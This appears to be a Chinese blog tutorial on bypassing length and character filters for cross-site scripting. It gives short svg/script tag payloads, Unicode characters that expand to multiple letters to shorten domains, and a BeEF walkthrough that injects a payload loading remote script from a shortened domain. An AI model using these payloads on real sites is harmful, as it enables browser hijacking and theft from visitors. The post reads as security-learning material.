当前位置:网站首页>限制字符绕过
限制字符绕过
2022-07-31 00:00:00 【Miracle_ze】
字符短域名绕过
一、绕过方法
1.1 重写,使用短标签
<svg/onload = ‘’ >
<script/ src = ’ ’ >
1.2 Unicode中多字符表示单字符
以下特殊字符会被html识别为单个字符
- ff expands to
ff
- ℠ expands to
sm
- ㏛ expands to
sr
- st expands to
st
- ㎭ expands to
rad
- ℡ expands to
tel
1.3 实体编码html
二、限制长度短字符短域名绕过
2.1 xss_clean 过滤语句
使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
添加结果:
由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
再次刷新页面同样显示
2.2
在观察前端引用文件时发现使用了jQuery
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>
注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
成功获取获取,在beef查看。
beef获取成功成功绕过。
三、kali的beef安装
边栏推荐
- How to Repair Word File Corruption
- 智能创意中的尺寸拓展模块
- Reverse linked list - in-place inversion method
- 借助深度估计的点云场景重建
- 游戏商城表建立
- Mysql体系化之JOIN运算实例分析
- oracle数据库版本问题咨询(就是对比从数据库查询出来的版本,和docker里面的oracle版本)?
- .NET 跨平台应用开发动手教程 |用 Uno Platform 构建一个 Kanban-style Todo App
- ZZULIOJ:1119: sequence order
- "Wei cup" school more than 2022 cattle summer camp 4 Nancy (polocy) pelosi article variance law of Arts
猜你喜欢
随机推荐
Soft Exam Study Plan
机器学习1一回归模型(二)
从编译的角度来学作用域!
Bugku sql注入
Shell编程条件语句 test命令 整数值,字符串比较 逻辑测试 文件测试
智能创意中的尺寸拓展模块
align-content、justify-content、align-items三个属性的作用和效果
Android安全性优化——APP加固
Week 19 Progress (Understanding IoT Basics)
HCIP第十五天笔记
Summary of the stock problem of state machine dynamic programming
46.<list链表的举列>
Soft Exam Summary
写了多年业务代码,我发现了这11个门道,只有内行才知道
Encapsulate and obtain system user information, roles and permission control
software development design process
.NET Cross-Platform Application Development Hands-on Tutorial | Build a Kanban-style Todo App with Uno Platform
pytorch的安装注意事项
软考学习计划
怎么开通代付通道接口?